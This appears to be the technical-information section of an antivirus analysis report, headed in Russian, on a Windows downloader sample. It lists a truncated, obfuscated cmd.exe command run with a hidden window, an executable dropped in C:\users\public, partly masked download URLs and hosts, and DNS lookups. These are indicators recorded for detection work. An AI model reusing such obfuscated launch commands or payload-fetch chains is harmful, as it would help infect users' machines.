Техническая информация
- '<SYSTEM32>\cmd.exe' lnNTSvoFmURQzq pmzTKQSniDjszmznOVC iEJUkUCfvjQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %bALlbJbSNOfmHVB%=iUYJJrRI&&set %NYFdvGldzq%=p&&set %zDiNvbRjd%=o^w&...
- C:\users\public\22760.exe
- C:\users\public\22760.exe
- 'hb##nte.com':80
- 'to######-technology.co.uk':80
- 'ar###igroup.com':80
- 'ca##n.us':80
- 'ba##no.com':80
- 'hu###omains.com':443
- http://hb##nte.com/HwFiV4/
- http://to######-technology.co.uk/BYvXGh/
- http://ar###igroup.com/0GHagS/
- http://ca##n.us/SYxX/
- http://ca##n.us/cgi-sys/suspendedpage.cgi
- http://ba##no.com/uBQZxCQ/
- 'hu###omains.com':443
- DNS ASK hb##nte.com
- DNS ASK to######-technology.co.uk
- DNS ASK ar###igroup.com
- DNS ASK ca##n.us
- DNS ASK ba##no.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\cmd.exe' lnNTSvoFmURQzq pmzTKQSniDjszmznOVC iEJUkUCfvjQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %bALlbJbSNOfmHVB%=iUYJJrRI&&set %NYFdvGldzq%=p&&set %zDiNvbRjd%=o^w&...' (со скрытым окном)